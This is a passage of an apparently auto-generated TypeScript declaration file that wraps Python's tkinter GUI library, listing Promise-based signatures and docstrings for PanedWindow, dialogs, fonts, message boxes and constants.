* \n\t\t * If the selection isn't in this widget then the\n\t\t * command has no effect.\n\t\t * \n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Sets or gets the currently selected element.\n\t\t * \n\t\t * If a spinbutton element is specified, it will be\n\t\t * displayed depressed.\n\t\t * \n\t\t */\n\t\tselection_element(element?): Promise<any>\n\t\tselection_element$({ element }: { element?}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection to INDEX.\n\t\t */\n\t\tselection_from(index): Promise<any>\n\t\tselection_from$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return True if there are characters selected in the spinbox, False\n\t\t * otherwise.\n\t\t */\n\t\tselection_present(): Promise<any>\n\t\tselection_present$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from START to END (not included).\n\t\t */\n\t\tselection_range(start, end): Promise<any>\n\t\tselection_range$({ start, end }): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection to INDEX.\n\t\t */\n\t\tselection_to(index): Promise<any>\n\t\tselection_to$({ index }): Promise<any>\n\t}\n\n\t/**\n\t * labelframe widget.\n\t */\n\n\t/**\n\t * Construct a labelframe widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * borderwidth, cursor, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, padx, pady, relief,\n\t * takefocus, text\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * background, class, colormap, container,\n\t * height, labelanchor, labelwidget,\n\t * visual, width\n\t * \n\t */\n\tfunction LabelFrame(master?, cnf?): Promise<ILabelFrame>\n\tfunction LabelFrame$({ master, cnf }: { master?, cnf?}): Promise<ILabelFrame>\n\tinterface ILabelFrame extends IWidget {\n\t}\n\n\t/**\n\t * panedwindow widget.\n\t */\n\n\t/**\n\t * Construct a panedwindow widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * background, borderwidth, cursor, height,\n\t * orient, relief, width\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * handlepad, handlesize, opaqueresize,\n\t * sashcursor, sashpad, sashrelief,\n\t * sashwidth, showhandle,\n\t * \n\t */\n\tfunction PanedWindow(master?, cnf?): Promise<IPanedWindow>\n\tfunction PanedWindow$({ master, cnf }: { master?, cnf?}): Promise<IPanedWindow>\n\tinterface IPanedWindow extends IWidget {\n\n\t\t/**\n\t\t * Add a child widget to the panedwindow in a new pane.\n\t\t * \n\t\t * The child argument is the name of the child widget\n\t\t * followed by pairs of arguments that specify how to\n\t\t * manage the windows. The possible options and values\n\t\t * are the ones accepted by the paneconfigure method.\n\t\t * \n\t\t */\n\t\tadd(child): Promise<any>\n\t\tadd$({ child }): Promise<any>\n\n\t\t/**\n\t\t * Remove the pane containing child from the panedwindow\n\t\t * \n\t\t * All geometry management options for child will be forgotten.\n\t\t * \n\t\t */\n\t\tremove(child): Promise<any>\n\t\tremove$({ child }): Promise<any>\n\n\t\t/**\n\t\t * Identify the panedwindow component at point x, y\n\t\t * \n\t\t * If the point is over a sash or a sash handle, the result\n\t\t * is a two element list containing the index of the sash or\n\t\t * handle, and a word indicating whether it is over a sash\n\t\t * or a handle, such as {0 sash} or {2 handle}. If the point\n\t\t * is over any other part of the panedwindow, the result is\n\t\t * an empty list.\n\t\t * \n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tproxy(): Promise<any>\n\t\tproxy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x and y pair of the most recent proxy location\n\t\t * \n\t\t */\n\t\tproxy_coord(): Promise<any>\n\t\tproxy_coord$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Remove the proxy from the display.\n\t\t * \n\t\t */\n\t\tproxy_forget(): Promise<any>\n\t\tproxy_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Place the proxy at the given x and y coordinates.\n\t\t * \n\t\t */\n\t\tproxy_place(x, y): Promise<any>\n\t\tproxy_place$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tsash(): Promise<any>\n\t\tsash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the current x and y pair for the sash given by index.\n\t\t * \n\t\t * Index must be an integer between 0 and 1 less than the\n\t\t * number of panes in the panedwindow. The coordinates given are\n\t\t * those of the top left corner of the region containing the sash.\n\t\t * pathName sash dragto index x y This command computes the\n\t\t * difference between the given coordinates and the coordinates\n\t\t * given to the last sash coord command for the given sash. It then\n\t\t * moves that sash the computed difference. The return value is the\n\t\t * empty string.\n\t\t * \n\t\t */\n\t\tsash_coord(index): Promise<any>\n\t\tsash_coord$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Records x and y for the sash given by index;\n\t\t * \n\t\t * Used in conjunction with later dragto commands to move the sash.\n\t\t * \n\t\t */\n\t\tsash_mark(index): Promise<any>\n\t\tsash_mark$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Place the sash given by index at the given coordinates\n\t\t * \n\t\t */\n\t\tsash_place(index, x, y): Promise<any>\n\t\tsash_place$({ index, x, y }): Promise<any>\n\n\t\t/**\n\t\t * Query a management option for window.\n\t\t * \n\t\t * Option may be any value allowed by the paneconfigure subcommand\n\t\t * \n\t\t */\n\t\tpanecget(child, option): Promise<any>\n\t\tpanecget$({ child, option }): Promise<any>\n\n\t\t/**\n\t\t * Query or modify the management options for window.\n\t\t * \n\t\t * If no option is specified, returns a list describing all\n\t\t * of the available options for pathName. If option is\n\t\t * specified with no value, then the command returns a list\n\t\t * describing the one named option (this list will be identical\n\t\t * to the corresponding sublist of the value returned if no\n\t\t * option is specified). If one or more option-value pairs are\n\t\t * specified, then the command modifies the given widget\n\t\t * option(s) to have the given value(s); in this case the\n\t\t * command returns an empty string. The following options\n\t\t * are supported:\n\t\t * \n\t\t * after window\n\t\t * Insert the window after the window specified. window\n\t\t * should be the name of a window already managed by pathName.\n\t\t * before window\n\t\t * Insert the window before the window specified. window\n\t\t * should be the name of a window already managed by pathName.\n\t\t * height size\n\t\t * Specify a height for the window. The height will be the\n\t\t * outer dimension of the window including its border, if\n\t\t * any. If size is an empty string, or if -height is not\n\t\t * specified, then the height requested internally by the\n\t\t * window will be used initially; the height may later be\n\t\t * adjusted by the movement of sashes in the panedwindow.\n\t\t * Size may be any value accepted by Tk_GetPixels.\n\t\t * minsize n\n\t\t * Specifies that the size of the window cannot be made\n\t\t * less than n. This constraint only affects the size of\n\t\t * the widget in the paned dimension -- the x dimension\n\t\t * for horizontal panedwindows, the y dimension for\n\t\t * vertical panedwindows. May be any value accepted by\n\t\t * Tk_GetPixels.\n\t\t * padx n\n\t\t * Specifies a non-negative value indicating how much\n\t\t * extra space to leave on each side of the window in\n\t\t * the X-direction. The value may have any of the forms\n\t\t * accepted by Tk_GetPixels.\n\t\t * pady n\n\t\t * Specifies a non-negative value indicating how much\n\t\t * extra space to leave on each side of the window in\n\t\t * the Y-direction. The value may have any of the forms\n\t\t * accepted by Tk_GetPixels.\n\t\t * sticky style\n\t\t * If a window's pane is larger than the requested\n\t\t * dimensions of the window, this option may be used\n\t\t * to position (or stretch) the window within its pane.\n\t\t * Style is a string that contains zero or more of the\n\t\t * characters n, s, e or w. The string can optionally\n\t\t * contains spaces or commas, but they are ignored. Each\n\t\t * letter refers to a side (north, south, east, or west)\n\t\t * that the window will \"stick\" to. If both n and s\n\t\t * (or e and w) are specified, the window will be\n\t\t * stretched to fill the entire height (or width) of\n\t\t * its cavity.\n\t\t * width size\n\t\t * Specify a width for the window. The width will be\n\t\t * the outer dimension of the window including its\n\t\t * border, if any. If size is an empty string, or\n\t\t * if -width is not specified, then the width requested\n\t\t * internally by the window will be used initially; the\n\t\t * width may later be adjusted by the movement of sashes\n\t\t * in the panedwindow. Size may be any value accepted by\n\t\t * Tk_GetPixels.\n\t\t * \n\t\t * \n\t\t */\n\t\tpaneconfigure(tagOrId, cnf?): Promise<any>\n\t\tpaneconfigure$({ tagOrId, cnf }: { tagOrId, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Returns an ordered list of the child panes.\n\t\t */\n\t\tpanes(): Promise<any>\n\t\tpanes$($: {}): Promise<any>\n\t\tpaneconfig\n\t}\n\tlet TclError: Promise<any>\n\tlet wantobjects: Promise<any>\n\tlet TkVersion: Promise<any>\n\tlet TclVersion: Promise<any>\n\tlet READABLE: Promise<any>\n\tlet WRITABLE: Promise<any>\n\tlet EXCEPTION: Promise<any>\n\tmodule colorchooser {\n\t\tvar _\n\n\t\t/**\n\t\t * Display dialog window for selection of a color.\n\t\t * \n\t\t * Convenience wrapper for the Chooser class. Displays the color\n\t\t * chooser dialog with color as the initial value.\n\t\t * \n\t\t */\n\t\tfunction askcolor(color?): Promise<any>\n\t\tfunction askcolor$({ color }: { color?}): Promise<any>\n\n\t\t/**\n\t\t * Create a dialog for the tk_chooseColor command.\n\t\t * \n\t\t * Args:\n\t\t * master: The master widget for this dialog. If not provided,\n\t\t * defaults to options['parent'] (if defined).\n\t\t * options: Dictionary of options for the tk_chooseColor call.\n\t\t * initialcolor: Specifies the selected color when the\n\t\t * dialog is first displayed. This can be a tk color\n\t\t * string or a 3-tuple of ints in the range (0, 255)\n\t\t * for an RGB triplet.\n\t\t * parent: The parent window of the color dialog. The\n\t\t * color dialog is displayed on top of this.\n\t\t * title: A string for the title of the dialog box.\n\t\t * \n\t\t */\n\t\tinterface IChooser {\n\t\t\tcommand\n\t\t}\n\t}\n\tmodule commondialog {\n\t\tvar _\n\t\tfunction Dialog(master?): Promise<IDialog>\n\t\tfunction Dialog$({ master }: { master?}): Promise<IDialog>\n\t\tinterface IDialog {\n\t\t\tshow(): Promise<any>\n\t\t\tshow$($: {}): Promise<any>\n\t\t\tcommand\n\t\t}\n\t}\n\tmodule constants {\n\t\tvar _\n\t\tlet NO: Promise<any>\n\t\tlet FALSE: Promise<any>\n\t\tlet OFF: Promise<any>\n\t\tlet YES: Promise<any>\n\t\tlet TRUE: Promise<any>\n\t\tlet ON: Promise<any>\n\t\tlet N: Promise<any>\n\t\tlet S: Promise<any>\n\t\tlet W: Promise<any>\n\t\tlet E: Promise<any>\n\t\tlet NW: Promise<any>\n\t\tlet SW: Promise<any>\n\t\tlet NE: Promise<any>\n\t\tlet SE: Promise<any>\n\t\tlet NS: Promise<any>\n\t\tlet EW: Promise<any>\n\t\tlet NSEW: Promise<any>\n\t\tlet CENTER: Promise<any>\n\t\tlet NONE: Promise<any>\n\t\tlet X: Promise<any>\n\t\tlet Y: Promise<any>\n\t\tlet BOTH: Promise<any>\n\t\tlet LEFT: Promise<any>\n\t\tlet TOP: Promise<any>\n\t\tlet RIGHT: Promise<any>\n\t\tlet BOTTOM: Promise<any>\n\t\tlet RAISED: Promise<any>\n\t\tlet SUNKEN: Promise<any>\n\t\tlet FLAT: Promise<any>\n\t\tlet RIDGE: Promise<any>\n\t\tlet GROOVE: Promise<any>\n\t\tlet SOLID: Promise<any>\n\t\tlet HORIZONTAL: Promise<any>\n\t\tlet VERTICAL: Promise<any>\n\t\tlet NUMERIC: Promise<any>\n\t\tlet CHAR: Promise<any>\n\t\tlet WORD: Promise<any>\n\t\tlet BASELINE: Promise<any>\n\t\tlet INSIDE: Promise<any>\n\t\tlet OUTSIDE: Promise<any>\n\t\tlet SEL: Promise<any>\n\t\tlet SEL_FIRST: Promise<any>\n\t\tlet SEL_LAST: Promise<any>\n\t\tlet END: Promise<any>\n\t\tlet INSERT: Promise<any>\n\t\tlet CURRENT: Promise<any>\n\t\tlet ANCHOR: Promise<any>\n\t\tlet ALL: Promise<any>\n\t\tlet NORMAL: Promise<any>\n\t\tlet DISABLED: Promise<any>\n\t\tlet ACTIVE: Promise<any>\n\t\tlet HIDDEN: Promise<any>\n\t\tlet CASCADE: Promise<any>\n\t\tlet CHECKBUTTON: Promise<any>\n\t\tlet COMMAND: Promise<any>\n\t\tlet RADIOBUTTON: Promise<any>\n\t\tlet SEPARATOR: Promise<any>\n\t\tlet SINGLE: Promise<any>\n\t\tlet BROWSE: Promise<any>\n\t\tlet MULTIPLE: Promise<any>\n\t\tlet EXTENDED: Promise<any>\n\t\tlet DOTBOX: Promise<any>\n\t\tlet UNDERLINE: Promise<any>\n\t\tlet PIESLICE: Promise<any>\n\t\tlet CHORD: Promise<any>\n\t\tlet ARC: Promise<any>\n\t\tlet FIRST: Promise<any>\n\t\tlet LAST: Promise<any>\n\t\tlet BUTT: Promise<any>\n\t\tlet PROJECTING: Promise<any>\n\t\tlet ROUND: Promise<any>\n\t\tlet BEVEL: Promise<any>\n\t\tlet MITER: Promise<any>\n\t\tlet MOVETO: Promise<any>\n\t\tlet SCROLL: Promise<any>\n\t\tlet UNITS: Promise<any>\n\t\tlet PAGES: Promise<any>\n\t}\n\tmodule dialog {\n\t\tvar _\n\t\tfunction Dialog(master?, cnf?): Promise<IDialog>\n\t\tfunction Dialog$({ master, cnf }: { master?, cnf?}): Promise<IDialog>\n\t\tinterface IDialog {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\t\tlet DIALOG_ICON: Promise<any>\n\t\tlet t: Promise<any>\n\t\tlet q: Promise<any>\n\t}\n\tmodule dnd {\n\t\tvar _\n\t\tfunction dnd_start(source, event): Promise<any>\n\t\tfunction dnd_start$({ source, event }): Promise<any>\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\t\tfunction DndHandler(source, event): Promise<IDndHandler>\n\t\tfunction DndHandler$({ source, event }): Promise<IDndHandler>\n\t\tinterface IDndHandler {\n\t\t\ton_motion(event): Promise<any>\n\t\t\ton_motion$({ event }): Promise<any>\n\t\t\ton_release(event): Promise<any>\n\t\t\ton_release$({ event }): Promise<any>\n\t\t\tcancel(event?): Promise<any>\n\t\t\tcancel$({ event }: { event?}): Promise<any>\n\t\t\tfinish(event, commit?): Promise<any>\n\t\t\tfinish$({ event, commit }: { event, commit?}): Promise<any>\n\t\t\troot\n\t\t}\n\t\tfunction Icon(name): Promise<IIcon>\n\t\tfunction Icon$({ name }): Promise<IIcon>\n\t\tinterface IIcon {\n\t\t\tattach(canvas, x?, y?): Promise<any>\n\t\t\tattach$({ canvas, x, y }: { canvas, x?, y?}): Promise<any>\n\t\t\tdetach(): Promise<any>\n\t\t\tdetach$($: {}): Promise<any>\n\t\t\tpress(event): Promise<any>\n\t\t\tpress$({ event }): Promise<any>\n\t\t\tmove(event): Promise<any>\n\t\t\tmove$({ event }): Promise<any>\n\t\t\tputback(): Promise<any>\n\t\t\tputback$($: {}): Promise<any>\n\t\t\twhere(canvas, event): Promise<any>\n\t\t\twhere$({ canvas, event }): Promise<any>\n\t\t\tdnd_end(target, event): Promise<any>\n\t\t\tdnd_end$({ target, event }): Promise<any>\n\t\t}\n\t\tfunction Tester(root): Promise<ITester>\n\t\tfunction Tester$({ root }): Promise<ITester>\n\t\tinterface ITester {\n\t\t\tdnd_accept(source, event): Promise<any>\n\t\t\tdnd_accept$({ source, event }): Promise<any>\n\t\t\tdnd_enter(source, event): Promise<any>\n\t\t\tdnd_enter$({ source, event }): Promise<any>\n\t\t\tdnd_motion(source, event): Promise<any>\n\t\t\tdnd_motion$({ source, event }): Promise<any>\n\t\t\tdnd_leave(source, event): Promise<any>\n\t\t\tdnd_leave$({ source, event }): Promise<any>\n\t\t\tdnd_commit(source, event): Promise<any>\n\t\t\tdnd_commit$({ source, event }): Promise<any>\n\t\t}\n\t}\n\tmodule filedialog {\n\t\tvar _\n\n\t\t/**\n\t\t * Ask for a filename to open\n\t\t */\n\t\tfunction askopenfilename(): Promise<any>\n\t\tfunction askopenfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to save as\n\t\t */\n\t\tfunction asksaveasfilename(): Promise<any>\n\t\tfunction asksaveasfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for multiple filenames to open\n\t\t * \n\t\t * Returns a list of filenames or empty list if\n\t\t * cancel button selected\n\t\t * \n\t\t */\n\t\tfunction askopenfilenames(): Promise<any>\n\t\tfunction askopenfilenames$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to open, and returned the opened file\n\t\t */\n\t\tfunction askopenfile(mode?): Promise<any>\n\t\tfunction askopenfile$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for multiple filenames and return the open file\n\t\t * objects\n\t\t * \n\t\t * returns a list of open file objects or an empty list if\n\t\t * cancel selected\n\t\t * \n\t\t */\n\t\tfunction askopenfiles(mode?): Promise<any>\n\t\tfunction askopenfiles$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to save as, and returned the opened file\n\t\t */\n\t\tfunction asksaveasfile(mode?): Promise<any>\n\t\tfunction asksaveasfile$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a directory, and return the file name\n\t\t */\n\t\tfunction askdirectory(): Promise<any>\n\t\tfunction askdirectory$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Simple test program.\n\t\t */\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Standard file selection dialog -- no checks on selected file.\n\t\t * \n\t\t * Usage:\n\t\t * \n\t\t * d = FileDialog(master)\n\t\t * fname = d.go(dir_or_file, pattern, default, key)\n\t\t * if fname is None: ...canceled...\n\t\t * else: ...open file...\n\t\t * \n\t\t * All arguments to go() are optional.\n\t\t * \n\t\t * The 'key' argument specifies a key in the global dictionary\n\t\t * 'dialogstates', which keeps track of the values for the directory\n\t\t * and pattern arguments, overriding the values passed in (it does\n\t\t * not keep track of the default argument!). If no key is specified,\n\t\t * the dialog keeps no memory of previous state. Note that memory is\n\t\t * kept even when the dialog is canceled. (All this emulates the\n\t\t * behavior of the Macintosh file selection dialogs.)\n\t\t * \n\t\t * \n\t\t */\n\t\tfunction FileDialog(master, title?): Promise<IFileDialog>\n\t\tfunction FileDialog$({ master, title }: { master, title?}): Promise<IFileDialog>\n\t\tinterface IFileDialog {\n\t\t\tgo(dir_or_file?, pattern?, def?, key?): Promise<any>\n\t\t\tgo$({ dir_or_file, pattern, def, key }: { dir_or_file?, pattern?, def?, key?}): Promise<any>\n\t\t\tquit(how?): Promise<any>\n\t\t\tquit$({ how }: { how?}): Promise<any>\n\t\t\tdirs_double_event(event): Promise<any>\n\t\t\tdirs_double_event$({ event }): Promise<any>\n\t\t\tdirs_select_event(event): Promise<any>\n\t\t\tdirs_select_event$({ event }): Promise<any>\n\t\t\tfiles_double_event(event): Promise<any>\n\t\t\tfiles_double_event$({ event }): Promise<any>\n\t\t\tfiles_select_event(event): Promise<any>\n\t\t\tfiles_select_event$({ event }): Promise<any>\n\t\t\tok_event(event): Promise<any>\n\t\t\tok_event$({ event }): Promise<any>\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): Promise<any>\n\t\t\tfilter_command(event?): Promise<any>\n\t\t\tfilter_command$({ event }: { event?}): Promise<any>\n\t\t\tget_filter(): Promise<any>\n\t\t\tget_filter$($: {}): Promise<any>\n\t\t\tget_selection(): Promise<any>\n\t\t\tget_selection$($: {}): Promise<any>\n\t\t\tcancel_command(event?): Promise<any>\n\t\t\tcancel_command$({ event }: { event?}): Promise<any>\n\t\t\tset_filter(dir, pat): Promise<any>\n\t\t\tset_filter$({ dir, pat }): Promise<any>\n\t\t\tset_selection(file): Promise<any>\n\t\t\tset_selection$({ file }): Promise<any>\n\t\t\ttitle\n\t\t}\n\n\t\t/**\n\t\t * File selection dialog which checks that the file exists.\n\t\t */\n\t\tinterface ILoadFileDialog extends IFileDialog {\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * File selection dialog which checks that the file may be created.\n\t\t */\n\t\tinterface ISaveFileDialog extends IFileDialog {\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_Dialog {\n\t\t}\n\n\t\t/**\n\t\t * Ask for a filename to open\n\t\t */\n\t\tinterface IOpen extends I_Dialog {\n\t\t\tcommand\n\t\t}\n\n\t\t/**\n\t\t * Ask for a filename to save as\n\t\t */\n\t\tinterface ISaveAs extends I_Dialog {\n\t\t}\n\n\t\t/**\n\t\t * Ask for a directory\n\t\t */\n\t\tinterface IDirectory {\n\t\t}\n\t\tlet dialogstates: Promise<any>\n\t}\n\tmodule font {\n\t\tvar _\n\n\t\t/**\n\t\t * Given the name of a tk named font, returns a Font representation.\n\t\t * \n\t\t */\n\t\tfunction nametofont(name, root?): Promise<any>\n\t\tfunction nametofont$({ name, root }: { name, root?}): Promise<any>\n\n\t\t/**\n\t\t * Get font families (as a tuple)\n\t\t */\n\t\tfunction families(root?, displayof?): Promise<any>\n\t\tfunction families$({ root, displayof }: { root?, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Get names of defined fonts (as a tuple)\n\t\t */\n\t\tfunction names(root?): Promise<any>\n\t\tfunction names$({ root }: { root?}): Promise<any>\n\n\t\t/**\n\t\t * Represents a named font.\n\t\t * \n\t\t * Constructor options are:\n\t\t * \n\t\t * font -- font specifier (name, system font, or (family, size, style)-tuple)\n\t\t * name -- name to use for this font configuration (defaults to a unique name)\n\t\t * exists -- does a named font by this name already exist?\n\t\t * Creates a new named font if False, points to the existing font if True.\n\t\t * Raises _tkinter.TclError if the assertion is false.\n\t\t * \n\t\t * the following are ignored if font is specified:\n\t\t * \n\t\t * family -- font 'family', e.g. Courier, Times, Helvetica\n\t\t * size -- font size in points\n\t\t * weight -- font thickness: NORMAL, BOLD\n\t\t * slant -- font slant: ROMAN, ITALIC\n\t\t * underline -- font underlining: false (0), true (1)\n\t\t * overstrike -- font strikeout: false (0), true (1)\n\t\t * \n\t\t * \n\t\t */\n\t\tfunction Font(root?, font?, name?, exists?: boolean): Promise<IFont>\n\t\tfunction Font$({ root, font, name, exists }: { root?, font?, name?, exists?}): Promise<IFont>\n\t\tinterface IFont {\n\n\t\t\t/**\n\t\t\t * Return a distinct copy of the current font\n\t\t\t */\n\t\t\tcopy(): Promise<any>\n\t\t\tcopy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return actual font attributes\n\t\t\t */\n\t\t\tactual(option?, displayof?): Promise<any>\n\t\t\tactual$({ option, displayof }: { option?, displayof?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get font attribute\n\t\t\t */\n\t\t\tcget(option): Promise<any>\n\t\t\tcget$({ option }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Modify font attributes\n\t\t\t */\n\t\t\tconfig(): Promise<any>\n\t\t\tconfig$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return text width\n\t\t\t */\n\t\t\tmeasure(text, displayof?): Promise<any>\n\t\t\tmeasure$({ text, displayof }: { text, displayof?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return font metrics.\n\t\t\t * \n\t\t\t * For best performance, create a dummy widget\n\t\t\t * using this font before calling this method.\n\t\t\t */\n\t\t\tmetrics(): Promise<any>\n\t\t\tmetrics$($: {}): Promise<any>\n\t\t\tcounter\n\t\t\tconfigure\n\t\t}\n\t\tlet NORMAL: Promise<any>\n\t\tlet ROMAN: Promise<any>\n\t\tlet BOLD: Promise<any>\n\t\tlet ITALIC: Promise<any>\n\t\tlet root: Promise<any>\n\t\tlet f: Promise<any>\n\t\tlet w: Promise<any>\n\t\tlet fb: Promise<any>\n\t}\n\tmodule messagebox {\n\t\tvar _\n\n\t\t/**\n\t\t * Show an info message\n\t\t */\n\t\tfunction showinfo(title?, message?): Promise<any>\n\t\tfunction showinfo$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Show a warning message\n\t\t */\n\t\tfunction showwarning(title?, message?): Promise<any>\n\t\tfunction showwarning$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Show an error message\n\t\t */\n\t\tfunction showerror(title?, message?): Promise<any>\n\t\tfunction showerror$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question\n\t\t */\n\t\tfunction askquestion(title?, message?): Promise<any>\n\t\tfunction askquestion$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask if operation should proceed; return true if the answer is ok\n\t\t */\n\t\tfunction askokcancel(title?, message?): Promise<any>\n\t\tfunction askokcancel$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question; return true if the answer is yes\n\t\t */\n\t\tfunction askyesno(title?, message?): Promise<any>\n\t\tfunction askyesno$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask a question; return true if the answer is yes, None if cancelled.\n\t\t */\n\t\tfunction askyesnocancel(title?, message?): Promise<any>\n\t\tfunction askyesnocancel$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * Ask if operation should be retried; return true if the answer is yes\n\t\t */\n\t\tfunction askretrycancel(title?, message?): Promise<any>\n\t\tfunction askretrycancel$({ title, message }: { title?, message?}): Promise<any>\n\n\t\t/**\n\t\t * A message box\n\t\t */\n\t\tinterface IMessage {\n\t\t\tcommand\n\t\t}\n\t\tlet ERROR: Promise<any>\n\t\tlet INFO: Promise<any>\n\t\tlet QUESTION: Promise<any>\n\t\tlet WARNING: Promise<any>\n\t\tlet ABORTRETRYIGNORE: Promise<any>\n\t\tlet OK: Promise<any>\n\t\tlet OKCANCEL: Promise<any>\n\t\tlet RETRYCANCEL: Promise<any>\n\t\tlet YESNO: Promise<any>\n\t\tlet YESNOCANCEL: Promise<any>\n\t\tlet ABORT: Promise<any>\n\t\tlet RETRY: Promise<any>\n\t\tlet IGNORE: Promise<any>\n\t\tlet CANCEL: Promise<any>\n\t\tlet YES: Promise<any>\n\t\tlet NO: Promise<any>\n\t}\n\tmodule scrolledtext {\n\t\tvar _\n\t\tfunction example(): Promise<any>\n\t\tfunction example$($: {}): Promise<any>\n\t\tfunction ScrolledText(master?): Promise<IScrolledText>\n\t\tfunction ScrolledText$({ master }: { master?}): Promise<IScrolledText>\n\t\tinterface IScrolledText {\n\t\t}\n\t}\n\tmodule simpledialog {\n\t\tvar _\n\n\t\t/**\n\t\t * get an integer from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is an integer\n\t\t * \n\t\t */\n\t\tfunction askinteger(title, prompt): Promise<any>\n\t\tfunction askinteger$({ title, prompt }): Promise<any>\n\n\t\t/**\n\t\t * get a float from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is a float\n\t\t * \n\t\t */\n\t\tfunction askfloat(title, prompt): Promise<any>\n\t\tfunction askfloat$({ title, prompt }): Promise<any>\n\n\t\t/**\n\t\t * get a string from the user\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * title -- the dialog title\n\t\t * prompt -- the label text\n\t\t * **kw -- see SimpleDialog class\n\t\t * \n\t\t * Return value is a string\n\t\t * \n\t\t */\n\t\tfunction askstring(title, prompt): Promise<any>\n\t\tfunction askstring$({ title, prompt }): Promise<any>\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\t\tfunction SimpleDialog(master, text?, buttons?, def?, cancel?, title?, class_?): Promise<ISimpleDialog>\n\t\tfunction SimpleDialog$({ master, text, buttons, def, cancel, title, class_ }: { master, text?, buttons?, def?, cancel?, title?, class_?}): Promise<ISimpleDialog>\n\t\tinterface ISimpleDialog {\n\t\t\tgo(): Promise<any>\n\t\t\tgo$($: {}): Promise<any>\n\t\t\treturn_event(event): Promise<any>\n\t\t\treturn_event$({ event }): Promise<any>\n\t\t\twm_delete_window(): Promise<any>\n\t\t\twm_delete_window$($: {}): Promise<any>\n\t\t\tdone(num): Promise<any>\n\t\t\tdone$({ num }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Class to open dialogs.\n\t\t * \n\t\t * This class is intended as a base class for custom dialogs\n\t\t * \n\t\t */\n\n\t\t/**\n\t\t * Initialize a dialog.\n\t\t * \n\t\t * Arguments:\n\t\t * \n\t\t * parent -- a parent window (the application window)\n\t\t * \n\t\t * title -- the dialog title\n\t\t * \n\t\t */\n\t\tfunction Dialog(parent, title?): Promise<IDialog>\n\t\tfunction Dialog$({ parent, title }: { parent, title?}): Promise<IDialog>\n\t\tinterface IDialog {\n\n\t\t\t/**\n\t\t\t * Destroy the window\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * create dialog body.\n\t\t\t * \n\t\t\t * return widget that should have initial focus.\n\t\t\t * This method should be overridden, and is called\n\t\t\t * by the __init__ method.\n\t\t\t * \n\t\t\t */\n\t\t\tbody(master): Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\n\t\t\t/**\n\t\t\t * add standard button box.\n\t\t\t * \n\t\t\t * override if you do not want the standard buttons\n\t\t\t * \n\t\t\t */\n\t\t\tbuttonbox(): Promise<any>\n\t\t\tbuttonbox$($: {}): Promise<any>\n\t\t\tok(event?): Promise<any>\n\t\t\tok$({ event }: { event?}): Promise<any>\n\t\t\tcancel(event?): Promise<any>\n\t\t\tcancel$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * validate the data\n\t\t\t * 